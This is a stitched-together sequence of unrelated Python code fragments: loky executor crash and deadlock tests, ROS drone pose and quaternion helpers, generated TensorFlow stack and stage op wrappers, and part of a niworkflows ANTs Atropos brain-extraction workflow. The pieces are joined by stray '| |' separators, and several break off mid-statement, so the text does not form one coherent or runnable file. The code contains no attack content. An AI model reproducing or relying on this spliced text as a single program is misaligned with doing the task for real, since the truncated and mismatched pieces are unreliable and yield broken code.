f = executor.submit(id_sleep, 42, delay)
f.add_done_callback(lambda _: exit())
assert f.result() == 42
assert executor.submit(id_sleep, 42, 0.1).result() == 42
executor = get_reusable_executor(max_workers=2)
f = executor.submit(id_sleep, 42, delay)
f.add_done_callback(lambda _: raise_error())
assert f.result() == 42
assert executor.submit(id_sleep, 42, 0.).result() == 42
def test_deadlock_kill(self):
"""Test deadlock recovery for reusable_executor"""
executor = get_reusable_executor(max_workers=1, timeout=None)
# trigger the spawning of the worker process
executor.submit(sleep, 0.1)
worker = next(iter(executor._processes.values()))
with pytest.warns(UserWarning) as recorded_warnings:
executor = get_reusable_executor(max_workers=2, timeout=None)
assert len(recorded_warnings) == 1
expected_msg = ("Trying to resize an executor with running jobs:"
" waiting for jobs completion before resizing.")
assert recorded_warnings[0].message.args[0] == expected_msg
os.kill(worker.pid, SIGKILL)
wait_dead(worker)
# wait for the executor to be able to detect the issue and set itself
# in broken state:
sleep(.5)
with pytest.raises(TerminatedWorkerError,
match=filter_match(r"SIGKILL")):
executor.submit(id_sleep, 42, 0.1).result()
# the get_reusable_executor factory should be able to create a new
# working instance
executor = get_reusable_executor(max_workers=2, timeout=None)
assert executor.submit(id_sleep, 42, 0.).result() == 42
@pytest.mark.parametrize("n_proc", [1, 2, 5, 13])
def test_crash_races(self, n_proc):
"""Test the race conditions in reusable_executor crash handling"""
if (sys.platform == 'win32' and sys.version_info >= (3, 8)
and n_proc > 5):
pytest.skip(
"On win32, the paging size can be too small to import numpy "
"multiple times in the sub-processes (imported when loading "
"this file). Skipping while no better solution is found. See "
"https://github.com/joblib/loky/issues/279 for more details."
)
# Test for external crash signal comming from neighbor
# with various race setup
executor = get_reusable_executor(max_workers=n_proc, timeout=None)
executor.map(id, range(n_proc)) # trigger the creation of the workers
pids = list(executor._processes.keys())
assert len(pids) == n_proc
assert None not in pids
res = executor.map(sleep_then_check_pids_exist,
[(.0001 * (j // 2), pids)
for j in range(2 * n_proc)])
assert all(list(res))
with pytest.raises(TerminatedWorkerError,
match=filter_match(r"SIGKILL")):
res = executor.map(kill_friend, pids[::-1])
list(res)
def test_imap_handle_iterable_exception(self):
# The catch of the errors in imap generation depend on the
# builded version of python
executor = get_reusable_executor(max_workers=2)
with pytest.raises(SayWhenError):
executor.map(id_sleep, exception_throwing_generator(10, 3),
chunksize=1)
# SayWhenError seen at start of problematic chunk's results
executor = get_reusable_executor(max_workers=2)
with pytest.raises(SayWhenError):
executor.map(id_sleep, exception_throwing_generator(20, 7),
chunksize=2)
executor = get_reusable_executor(max_workers=2)
with pytest.raises(SayWhenError):
executor.map(id_sleep, exception_throwing_generator(20, 7),
chunksize=4)
def test_queue_full_deadlock(self):
executor = get_reusable_executor(max_workers=1)
fs_fail = [executor.submit(do_nothing, ErrorAtPickle(True))
for i in range(100)]
fs = [executor.submit(do_nothing, ErrorAtPickle(False))
for i in range(100)]
with pytest.raises(PicklingError):
fs_fail[99].result()
assert fs[99].result()
def test_informative_error_when_fail_at_unpickle(self):
executor = get_reusable_executor(max_workers=2)
obj = ErrorAtUnpickle(RuntimeError, 'message raised in child')
f = executor.submit(id, obj)
with pytest.raises(BrokenProcessPool) as exc_info:
f.result()
assert 'RuntimeError' in str(exc_info.value.__cause__)
assert 'message raised in child' | |
# -*- coding: utf-8 -*-
"""
Helper functions and classes for general use.
"""
from __future__ import division
from functools import partial, update_wrapper
from time import localtime, strftime
import numpy as np
from numpy.linalg import norm
import rospy
from geometry_msgs.msg import Point, PoseStamped, Quaternion
from sensor_msgs.msg import Image
from std_msgs.msg import Header
import tf
d2r = np.deg2rad
r2d = np.rad2deg
EULER_CONVENTION = "rxyz"
def unit_vector(v):
"""
Change the length of the vector to unity in the same direction.
Parameters
----------
v : array-like
A vector to be normalized.
Returns
-------
np.ndarray
The normalized vector, or the original vector if it has a length of 0.
"""
norm = np.linalg.norm(v)
if norm:
return v / norm
else:
return np.asarray(v)
# noinspection PyPep8Naming
class memoize(object):
def __init__(self, func):
self.func = func
update_wrapper(self, func)
def __get__(self, instance, owner):
if instance is None:
return self.func
return partial(self, instance)
def __call__(self, *args, **kwargs):
obj = args[0]
try:
cache = obj.__cache__
except AttributeError:
cache = obj.__cache__ = {}
key = (self.func, args[1:], frozenset(kwargs.items()))
try:
res = cache[key]
except KeyError:
res = cache[key] = self.func(*args, **kwargs)
return res
class Pose(object):
"""
Convenience wrapper for PoseStamped.
Parameters
----------
pose_stamped : PoseStamped
The pose message.
Attributes
----------
pose_stamped : PoseStamped
The pose message.
position : np.ndarray
The x, y, and z coordinates contained in the pose.
orientation : np.ndarray
The x, y, z, and w quaternion contained in the pose.
header : Header
The header from the pose message
"""
def __init__(self, pose_stamped):
self.pose_stamped = pose_stamped
self.position, self.orientation = self._components(self.pose_stamped)
self.header = self.pose_stamped.header
def rel_position(self, pose, rotation_matrix=None):
"""
Calculate the relative position with another pose, with local reference.
Parameters
----------
pose : Pose
The target pose.
rotation_matrix : Optional[np.ndarray]
The rotation matrix to use. If not provided, the rotation matrix of
the current pose is used.
Returns
-------
np.ndarray
The x, y, z relative positions.
"""
if rotation_matrix is None:
rotation_matrix = Quat.rotation_matrix(self.orientation)
return rotation_matrix.dot(pose.position - self.position)
def rel_euler(self, pose):
"""
Calculate the relative angle with another pose.
Parameters
----------
pose : Pose
The target pose.
Returns
-------
np.ndarray
The relative angle as Euler, in the order of pitch, roll, yaw.
"""
return Quat.to_euler(Quat.rel_rotation(pose.orientation,
self.orientation))
def distance(self, pose):
"""
Calculate the distance to another pose.
Parameters
----------
pose : Pose
The target pose.
Returns
-------
float
The distance to the target pose.
"""
return norm(pose.position - self.position)
@staticmethod
def _components(pose_stamped):
"""
Return the position and orientation of a PoseStamped as numpy arrays.
Parameters
----------
pose_stamped : Pose(WithCovariance)?(Stamped)?
The pose to be decomposed.
Returns
-------
position : np.ndarray
The x, y, and z coordinates contained in the pose.
orientation : np.ndarray
The x, y, z, and w quaternion contained in the pose.
"""
position = np.array([pose_stamped.pose.position.x,
pose_stamped.pose.position.y,
pose_stamped.pose.position.z])
orientation = np.array([pose_stamped.pose.orientation.x,
pose_stamped.pose.orientation.y,
pose_stamped.pose.orientation.z,
pose_stamped.pose.orientation.w])
return position, orientation
@classmethod
def from_components(cls, position, orientation, sequence=0):
"""
Generate a Pose from its components.
Parameters
----------
position : Sequence[float]
The x, y, and z coordinates of the pose.
orientation : Sequence[float]
The x, y, z, and w quaternion of the pose.
sequence : Optional[int]
The sequence number of the pose.
Returns
-------
Pose
The generated pose.
"""
return cls(cls.generate_stamped(position, orientation, sequence))
@staticmethod
def generate_stamped(position, orientation, sequence=0):
"""
Generate a PoseStamped from its components.
Parameters
----------
position : Sequence[float]
The x, y, and z coordinates of the pose.
orientation : Sequence[float]
The x, y, z, and w quaternion of the pose.
sequence : Optional[int]
The sequence number of the pose.
Returns
-------
PoseStamped
The generated pose.
"""
pose_stamped = PoseStamped()
pose_stamped.header.seq = sequence
try:
pose_stamped.header.stamp = rospy.Time.now()
except rospy.exceptions.ROSInitException:
pass
pose_stamped.pose.position = Point(*position)
pose_stamped.pose.orientation = Quaternion(*orientation)
return pose_stamped
def __repr__(self):
return "<Pose ({position}, {orientation})>".format(
position=self.position.tolist(),
orientation=self.orientation.tolist(),
time=self.header.stamp)
def __str__(self):
return "<Pose ({position}, {orientation}): {time}>".format(
position=self.position.tolist(),
orientation=self.orientation.tolist(),
time=self.header.stamp)
class Frame(object):
"""
Encapsulate an image and the pose it was taken in.
Parameters
----------
pose_stamped : PoseStamped
The pose of the drone when the image was taken.
image : Image
The image that was taken.
Attributes
----------
pose_stamped : PoseStamped
The raw pose message of the drone at which the image was taken.
pose : Pose
The pose of the drone at which the image was taken.
rotation_matrix : np.ndarray
The rotation matrix of the frame orientation.
image : Image
The image that was taken.
stamp : rospy.rostime.Time
The timestamp of the pose.
stamp_str : str
The timestamp of the pose, in human readable format.
"""
def __init__(self, pose_stamped, image):
self.pose_stamped = pose_stamped
self.pose = Pose(pose_stamped)
self.rotation_matrix = Quat.rotation_matrix(self.pose.orientation)
self.image = image
self.stamp = self.pose.header.stamp
self.stamp_str = strftime("%Y-%m-%d %H:%M:%S",
localtime(self.stamp.to_time()))
@memoize
def rel_position(self, pose):
"""
Calculate the relative position with another pose, with local reference.
Parameters
----------
pose : Pose
The target pose.
Returns
-------
np.ndarray
The x, y, z relative positions.
"""
return self.pose.rel_position(pose,
rotation_matrix=self.rotation_matrix)
@memoize
def rel_euler(self, pose):
"""
Calculate the relative angle with another pose.
Parameters
----------
pose : Pose
The target pose.
Returns
-------
np.ndarray
The relative angle as Euler, in the order of pitch, roll, yaw.
"""
return self.pose.rel_euler(pose)
@memoize
def distance(self, pose):
"""
Calculate the distance to another pose.
Parameters
----------
pose : Pose
The target pose.
Returns
-------
float
The distance to the target pose.
"""
return self.pose.distance(pose)
def __repr__(self):
return "<Frame({pose})>".format(pose=self.pose)
class Fov(object):
"""
Field of view methods.
"""
@staticmethod
def d2v(fov_diagonal, aspect_ratio=4 / 3):
"""
Convert a diagonal field of view to vertical.
Parameters
----------
fov_diagonal : float
The diagonal field of view.
aspect_ratio: Optional[float]
The aspect ratio of the display. Default is 4:3.
Returns
-------
float
The vertical field of view.
"""
ratio_diagonal = np.sqrt(1 + aspect_ratio**2)
return 2 * r2d(np.arctan(np.tan(d2r(fov_diagonal) / 2)
/ ratio_diagonal))
@staticmethod
def v2h(fov_vertical, aspect_ratio=4 / 3):
"""
Convert a vertical field of view to horizontal.
Parameters
----------
fov_vertical : float
The vertical field of view.
aspect_ratio: Optional[float]
The aspect ratio of the display. Default is 4:3.
Returns
-------
float
The horizontal field of view.
"""
return 2 * r2d(np.arctan(np.tan(d2r(fov_vertical) / 2) * aspect_ratio))
class Quat(object):
"""
Quaternion methods.
"""
@staticmethod
def to_euler(quaternion):
"""
Change a quaternion to an Euler angle representation.
Parameters
----------
quaternion : np.ndarray
A quaternion in the order of x, y, z, w.
Returns
-------
np.ndarray
The Euler angle, in the order of pitch, roll, yaw.
"""
# noinspection PyUnresolvedReferences
return tf.transformations.euler_from_quaternion(quaternion,
EULER_CONVENTION)
@staticmethod
def to_axis(quaternion):
"""
Change a quaternion to an axis-angle representation.
Parameters
----------
quaternion : np.ndarray
A quaternion in the order of x, y, z, w.
Notes
-----
θ is in degrees rather than radians, for ease of integration in OpenGL.
Returns
-------
tuple
The angle in axis-angle representation, with the order of θ, x, y,
z. θ is in degrees.
"""
x, y, z, w = unit_vector(quaternion)
angle = r2d(2 * np.arccos(w))
if angle == 0:
axis_x = 1
axis_y = axis_z = 0
elif angle % 180 == 0:
axis_x, axis_y, axis_z = x, y, z
else:
axis_x = x / np.sqrt(1 - w**2)
axis_y = y / np.sqrt(1 - w**2)
axis_z = z / np.sqrt(1 - w**2)
return angle, axis_x, axis_y, axis_z
@staticmethod
def product(a, b):
"""
Find the product of two quaternions.
Parameters
----------
a : Sequence[float]
A quaternion, in the order of x, y, z, w
b : Sequence[float]
A quaternion, in the order of x, y, z, w
Returns
-------
np.ndarray
A quaternion, in the order of x, y, z, w
"""
imaginary_part = a[3] * b[:3] + b[3] * a[:3] + np.cross(a[:3], b[:3])
real_part = a[3] * b[3] - np.dot(a[:3], b[:3])
return np.append(imaginary_part, real_part)
@staticmethod
def inverse(quaternion):
"""
Return the inverse of a quaternion
Parameters
----------
quaternion : Sequence[float]
A quaternion, in the order of x, y, z, w
Returns
-------
np.ndarray
The inverse of the quaternion.
"""
return (quaternion * np.array([-1, -1, -1, 1])
/ np.linalg.norm(quaternion)**2)
@staticmethod
def rel_rotation(a, b):
"""
Find the quaternion which produces a rotation from `a` to `b`.
Parameters
----------
a : Sequence[float]
A quaternion, in the order of x, y, z, w
b : Sequence[float]
A | |
graph.
elem_type = _execute.make_type(elem_type, "elem_type")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"StackPop", handle=handle, elem_type=elem_type, name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("elem_type", _op._get_attr_type("elem_type"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"StackPop", _inputs_flat, _attrs, _result)
_result, = _result
return _result
StackPop = tf_export("raw_ops.StackPop")(_ops.to_raw_op(stack_pop))
def stack_pop_eager_fallback(handle, elem_type, name, ctx):
raise RuntimeError("stack_pop op does not support eager execution. Arg 'handle' is a ref.")
def stack_pop_v2(handle, elem_type, name=None):
r"""Pop the element at the top of the stack.
Args:
handle: A `Tensor` of type `resource`. The handle to a stack.
elem_type: A `tf.DType`. The type of the elem that is popped.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `elem_type`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx._context_handle, tld.device_name, "StackPopV2", name,
tld.op_callbacks, handle, "elem_type", elem_type)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return stack_pop_v2_eager_fallback(
handle, elem_type=elem_type, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
elem_type = _execute.make_type(elem_type, "elem_type")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"StackPopV2", handle=handle, elem_type=elem_type, name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("elem_type", _op._get_attr_type("elem_type"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"StackPopV2", _inputs_flat, _attrs, _result)
_result, = _result
return _result
StackPopV2 = tf_export("raw_ops.StackPopV2")(_ops.to_raw_op(stack_pop_v2))
def stack_pop_v2_eager_fallback(handle, elem_type, name, ctx):
elem_type = _execute.make_type(elem_type, "elem_type")
handle = _ops.convert_to_tensor(handle, _dtypes.resource)
_inputs_flat = [handle]
_attrs = ("elem_type", elem_type)
_result = _execute.execute(b"StackPopV2", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"StackPopV2", _inputs_flat, _attrs, _result)
_result, = _result
return _result
def stack_push(handle, elem, swap_memory=False, name=None):
r"""Deprecated, use StackPushV2.
Args:
handle: A `Tensor` of type mutable `string`.
elem: A `Tensor`.
swap_memory: An optional `bool`. Defaults to `False`.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `elem`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
raise RuntimeError("stack_push op does not support eager execution. Arg 'handle' is a ref.")
# Add nodes to the TensorFlow graph.
if swap_memory is None:
swap_memory = False
swap_memory = _execute.make_bool(swap_memory, "swap_memory")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"StackPush", handle=handle, elem=elem, swap_memory=swap_memory,
name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T", _op._get_attr_type("T"), "swap_memory",
_op._get_attr_bool("swap_memory"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"StackPush", _inputs_flat, _attrs, _result)
_result, = _result
return _result
StackPush = tf_export("raw_ops.StackPush")(_ops.to_raw_op(stack_push))
def stack_push_eager_fallback(handle, elem, swap_memory, name, ctx):
raise RuntimeError("stack_push op does not support eager execution. Arg 'handle' is a ref.")
def stack_push_v2(handle, elem, swap_memory=False, name=None):
r"""Push an element onto the stack.
Args:
handle: A `Tensor` of type `resource`. The handle to a stack.
elem: A `Tensor`. The tensor to be pushed onto the stack.
swap_memory: An optional `bool`. Defaults to `False`.
Swap `elem` to CPU. Default to false.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `elem`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx._context_handle, tld.device_name, "StackPushV2", name,
tld.op_callbacks, handle, elem, "swap_memory", swap_memory)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return stack_push_v2_eager_fallback(
handle, elem, swap_memory=swap_memory, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
if swap_memory is None:
swap_memory = False
swap_memory = _execute.make_bool(swap_memory, "swap_memory")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"StackPushV2", handle=handle, elem=elem, swap_memory=swap_memory,
name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T", _op._get_attr_type("T"), "swap_memory",
_op._get_attr_bool("swap_memory"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"StackPushV2", _inputs_flat, _attrs, _result)
_result, = _result
return _result
StackPushV2 = tf_export("raw_ops.StackPushV2")(_ops.to_raw_op(stack_push_v2))
def stack_push_v2_eager_fallback(handle, elem, swap_memory, name, ctx):
if swap_memory is None:
swap_memory = False
swap_memory = _execute.make_bool(swap_memory, "swap_memory")
_attr_T, (elem,) = _execute.args_to_matching_eager([elem], ctx)
handle = _ops.convert_to_tensor(handle, _dtypes.resource)
_inputs_flat = [handle, elem]
_attrs = ("T", _attr_T, "swap_memory", swap_memory)
_result = _execute.execute(b"StackPushV2", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"StackPushV2", _inputs_flat, _attrs, _result)
_result, = _result
return _result
def stack_v2(max_size, elem_type, stack_name="", name=None):
r"""A stack that produces elements in first-in last-out order.
Args:
max_size: A `Tensor` of type `int32`.
The maximum size of the stack if non-negative. If negative, the stack
size is unlimited.
elem_type: A `tf.DType`. The type of the elements on the stack.
stack_name: An optional `string`. Defaults to `""`.
Overrides the name used for the temporary stack resource. Default
value is the name of the 'Stack' op (which is guaranteed unique).
name: A name for the operation (optional).
Returns:
A `Tensor` of type `resource`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx._context_handle, tld.device_name, "StackV2", name,
tld.op_callbacks, max_size, "elem_type", elem_type, "stack_name",
stack_name)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return stack_v2_eager_fallback(
max_size, elem_type=elem_type, stack_name=stack_name, name=name,
ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
elem_type = _execute.make_type(elem_type, "elem_type")
if stack_name is None:
stack_name = ""
stack_name = _execute.make_str(stack_name, "stack_name")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"StackV2", max_size=max_size, elem_type=elem_type,
stack_name=stack_name, name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("elem_type", _op._get_attr_type("elem_type"), "stack_name",
_op.get_attr("stack_name"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"StackV2", _inputs_flat, _attrs, _result)
_result, = _result
return _result
StackV2 = tf_export("raw_ops.StackV2")(_ops.to_raw_op(stack_v2))
def stack_v2_eager_fallback(max_size, elem_type, stack_name, name, ctx):
elem_type = _execute.make_type(elem_type, "elem_type")
if stack_name is None:
stack_name = ""
stack_name = _execute.make_str(stack_name, "stack_name")
max_size = _ops.convert_to_tensor(max_size, _dtypes.int32)
_inputs_flat = [max_size]
_attrs = ("elem_type", elem_type, "stack_name", stack_name)
_result = _execute.execute(b"StackV2", 1, inputs=_inputs_flat, attrs=_attrs,
ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"StackV2", _inputs_flat, _attrs, _result)
_result, = _result
return _result
def stage(values, capacity=0, memory_limit=0, container="", shared_name="", name=None):
r"""Stage values similar to a lightweight Enqueue.
The basic functionality of this Op is similar to a queue with many
fewer capabilities and options. This Op is optimized for performance.
Args:
values: A list of `Tensor` objects. a list of tensors
dtypes A list of data types that inserted values should adhere to.
capacity: An optional `int` that is `>= 0`. Defaults to `0`.
Maximum number of elements in the Staging Area. If > 0, inserts
on the container will block when the capacity is reached.
memory_limit: An optional `int` that is `>= 0`. Defaults to `0`.
The maximum number of bytes allowed for Tensors in the Staging Area.
If > 0, inserts will block until sufficient space is available.
container: An optional `string`. Defaults to `""`.
If non-empty, this queue is placed in the given container. Otherwise,
a default container is used.
shared_name: An optional `string`. Defaults to `""`.
It is necessary to match this name to the matching Unstage Op.
name: A name for the operation (optional).
Returns:
The created Operation.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx._context_handle, tld.device_name, "Stage", name,
tld.op_callbacks, values, "capacity", capacity, "memory_limit",
memory_limit, "container", container, "shared_name", shared_name)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return stage_eager_fallback(
values, capacity=capacity, memory_limit=memory_limit,
container=container, shared_name=shared_name, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
if capacity is None:
capacity = 0
capacity = _execute.make_int(capacity, "capacity")
if memory_limit is None:
memory_limit = 0
memory_limit = _execute.make_int(memory_limit, "memory_limit")
if container is None:
container = ""
container = _execute.make_str(container, "container")
if shared_name is None:
shared_name = ""
shared_name = _execute.make_str(shared_name, "shared_name")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"Stage", values=values, capacity=capacity, memory_limit=memory_limit,
container=container, shared_name=shared_name, name=name)
return _op
Stage = tf_export("raw_ops.Stage")(_ops.to_raw_op(stage))
def stage_eager_fallback(values, capacity, memory_limit, container, shared_name, name, ctx):
if capacity is None:
capacity = 0
capacity = _execute.make_int(capacity, "capacity")
if memory_limit is None:
memory_limit = 0
memory_limit = _execute.make_int(memory_limit, "memory_limit")
if container is None:
container = ""
container = _execute.make_str(container, "container")
if shared_name is None:
shared_name = ""
shared_name = _execute.make_str(shared_name, "shared_name")
_attr_dtypes, values = _execute.convert_to_mixed_eager_tensors(values, ctx)
_inputs_flat = list(values)
_attrs = ("capacity", capacity, "memory_limit", memory_limit, "dtypes",
_attr_dtypes, "container", container, "shared_name", shared_name)
_result = _execute.execute(b"Stage", 0, inputs=_inputs_flat, attrs=_attrs,
ctx=ctx, name=name)
_result = None
return _result
def stage_clear(dtypes, capacity=0, memory_limit=0, container="", shared_name="", name=None):
r"""Op removes all elements in the underlying container.
Args:
dtypes: A list of `tf.DTypes`.
capacity: An optional `int` that is `>= 0`. Defaults to `0`.
memory_limit: | |
"reference_image")]),
(norm, map_wmmask, [
("reverse_transforms", "transforms"),
("reverse_invert_flags", "invert_transform_flags"),
]),
(map_wmmask, inu_n4_final, [("output_image", "weight_image")]),
])
# fmt: on
if use_laplacian:
lap_tmpl = pe.Node(
ImageMath(operation="Laplacian", op2="1.5 1", copy_header=True),
name="lap_tmpl",
)
lap_tmpl.inputs.op1 = tpl_target_path
lap_target = pe.Node(
ImageMath(operation="Laplacian", op2="1.5 1", copy_header=True),
name="lap_target",
)
mrg_tmpl = pe.Node(niu.Merge(2), name="mrg_tmpl")
mrg_tmpl.inputs.in1 = tpl_target_path
mrg_target = pe.Node(niu.Merge(2), name="mrg_target")
# fmt: off
wf.connect([
(inu_n4, lap_target, [(("output_image", _pop), "op1")]),
(lap_tmpl, mrg_tmpl, [("output_image", "in2")]),
(inu_n4, mrg_target, [("output_image", "in1")]),
(lap_target, mrg_target, [("output_image", "in2")]),
(mrg_tmpl, norm, [("out", "fixed_image")]),
(mrg_target, norm, [("out", "moving_image")]),
])
# fmt: on
else:
norm.inputs.fixed_image = tpl_target_path
# fmt: off
wf.connect([
(inu_n4, norm, [(("output_image", _pop), "moving_image")]),
])
# fmt: on
if atropos_refine:
atropos_model = atropos_model or list(ATROPOS_MODELS[bids_suffix].values())
atropos_wf = init_atropos_wf(
use_random_seed=atropos_use_random_seed,
omp_nthreads=omp_nthreads,
mem_gb=mem_gb,
in_segmentation_model=atropos_model,
bspline_fitting_distance=bspline_fitting_distance,
wm_prior=bool(wm_tpm),
)
# fmt: off
wf.disconnect([
(thr_brainmask, outputnode, [("output_image", "out_mask")]),
(inu_n4_final, outputnode, [("output_image", "bias_corrected"),
("bias_image", "bias_image")]),
(apply_mask, outputnode, [("out_file", "out_file")]),
])
wf.connect([
(inputnode, atropos_wf, [("in_files", "inputnode.in_files")]),
(inu_n4_final, atropos_wf, [("output_image", "inputnode.in_corrected")]),
(thr_brainmask, atropos_wf, [("output_image", "inputnode.in_mask")]),
(atropos_wf, outputnode, [
("outputnode.out_file", "out_file"),
("outputnode.bias_corrected", "bias_corrected"),
("outputnode.bias_image", "bias_image"),
("outputnode.out_mask", "out_mask"),
("outputnode.out_segm", "out_segm"),
("outputnode.out_tpms", "out_tpms"),
]),
])
# fmt: on
if wm_tpm:
# fmt: off
wf.connect([
(map_wmmask, atropos_wf, [("output_image", "inputnode.wm_prior")]),
])
# fmt: on
return wf
def init_atropos_wf(
name="atropos_wf",
use_random_seed=True,
omp_nthreads=None,
mem_gb=3.0,
padding=10,
in_segmentation_model=tuple(ATROPOS_MODELS["T1w"].values()),
bspline_fitting_distance=200,
wm_prior=False,
):
"""
Create an ANTs' ATROPOS workflow for brain tissue segmentation.
Re-interprets supersteps 6 and 7 of ``antsBrainExtraction.sh``,
which refine the mask previously computed with the spatial
normalization to the template.
The workflow also executes steps 8 and 9 of the brain extraction
workflow.
Workflow Graph
.. workflow::
:graph2use: orig
:simple_form: yes
from niworkflows.anat.ants import init_atropos_wf
wf = init_atropos_wf()
Parameters
----------
name : str, optional
Workflow name (default: "atropos_wf").
use_random_seed : bool
Whether ATROPOS should generate a random seed based on the
system's clock
omp_nthreads : int
Maximum number of threads an individual process may use
mem_gb : float
Estimated peak memory consumption of the most hungry nodes
in the workflow
padding : int
Pad images with zeros before processing
in_segmentation_model : tuple
A k-means segmentation is run to find gray or white matter
around the edge of the initial brain mask warped from the
template.
This produces a segmentation image with :math:`$K$` classes,
ordered by mean intensity in increasing order.
With this option, you can control :math:`$K$` and tell the script which
classes represent CSF, gray and white matter.
Format (K, csfLabel, gmLabel, wmLabel).
Examples:
``(3,1,2,3)`` for T1 with K=3, CSF=1, GM=2, WM=3 (default),
``(3,3,2,1)`` for T2 with K=3, CSF=3, GM=2, WM=1,
``(3,1,3,2)`` for FLAIR with K=3, CSF=1 GM=3, WM=2,
``(4,4,2,3)`` uses K=4, CSF=4, GM=2, WM=3.
bspline_fitting_distance : float
The size of the b-spline mesh grid elements, in mm (default: 200)
wm_prior : :obj:`bool`
Whether the WM posterior obtained with ATROPOS should be regularized with a prior
map (typically, mapped from the template). When ``wm_prior`` is ``True`` the input
field ``wm_prior`` of the input node must be connected.
Inputs
------
in_files : list
The original anatomical images passed in to the brain-extraction workflow.
in_corrected : list
:abbr:`INU (intensity non-uniformity)`-corrected files.
in_mask : str
Brain mask calculated previously.
wm_prior : :obj:`str`
Path to the WM prior probability map, aligned with the individual data.
Outputs
-------
out_file : :obj:`str`
Path of the corrected and brain-extracted result, using the ATROPOS refinement.
bias_corrected : :obj:`str`
Path of the corrected and result, using the ATROPOS refinement.
bias_image : :obj:`str`
Path of the estimated INU bias field, using the ATROPOS refinement.
out_mask : str
Refined brain mask
out_segm : str
Output segmentation
out_tpms : str
Output :abbr:`TPMs (tissue probability maps)`
"""
wf = pe.Workflow(name)
out_fields = ["bias_corrected", "bias_image", "out_mask", "out_segm", "out_tpms"]
inputnode = pe.Node(
niu.IdentityInterface(
fields=["in_files", "in_corrected", "in_mask", "wm_prior"]
),
name="inputnode",
)
outputnode = pe.Node(
niu.IdentityInterface(fields=["out_file"] + out_fields), name="outputnode"
)
copy_xform = pe.Node(
CopyXForm(fields=out_fields), name="copy_xform", run_without_submitting=True
)
# Morphological dilation, radius=2
dil_brainmask = pe.Node(
ImageMath(operation="MD", op2="2", copy_header=True), name="dil_brainmask"
)
# Get largest connected component
get_brainmask = pe.Node(
ImageMath(operation="GetLargestComponent", copy_header=True),
name="get_brainmask",
)
# Run atropos (core node)
atropos = pe.Node(
Atropos(
convergence_threshold=0.0,
dimension=3,
initialization="KMeans",
likelihood_model="Gaussian",
mrf_radius=[1, 1, 1],
mrf_smoothing_factor=0.1,
n_iterations=3,
number_of_tissue_classes=in_segmentation_model[0],
save_posteriors=True,
use_random_seed=use_random_seed,
),
name="01_atropos",
n_procs=omp_nthreads,
mem_gb=mem_gb,
)
# massage outputs
pad_segm = pe.Node(
ImageMath(operation="PadImage", op2=f"{padding}", copy_header=False),
name="02_pad_segm",
)
pad_mask = pe.Node(
ImageMath(operation="PadImage", op2=f"{padding}", copy_header=False),
name="03_pad_mask",
)
# Split segmentation in binary masks
sel_labels = pe.Node(
niu.Function(
function=_select_labels, output_names=["out_wm", "out_gm", "out_csf"]
),
name="04_sel_labels",
)
sel_labels.inputs.labels = list(reversed(in_segmentation_model[1:]))
# Select largest components (GM, WM)
# ImageMath ${DIMENSION} ${EXTRACTION_WM} GetLargestComponent ${EXTRACTION_WM}
get_wm = pe.Node(ImageMath(operation="GetLargestComponent"), name="05_get_wm")
get_gm = pe.Node(ImageMath(operation="GetLargestComponent"), name="06_get_gm")
# Fill holes and calculate intersection
# ImageMath ${DIMENSION} ${EXTRACTION_TMP} FillHoles ${EXTRACTION_GM} 2
# MultiplyImages ${DIMENSION} ${EXTRACTION_GM} ${EXTRACTION_TMP} ${EXTRACTION_GM}
fill_gm = pe.Node(ImageMath(operation="FillHoles", op2="2"), name="07_fill_gm")
mult_gm = pe.Node(
MultiplyImages(dimension=3, output_product_image="08_mult_gm.nii.gz"),
name="08_mult_gm",
)
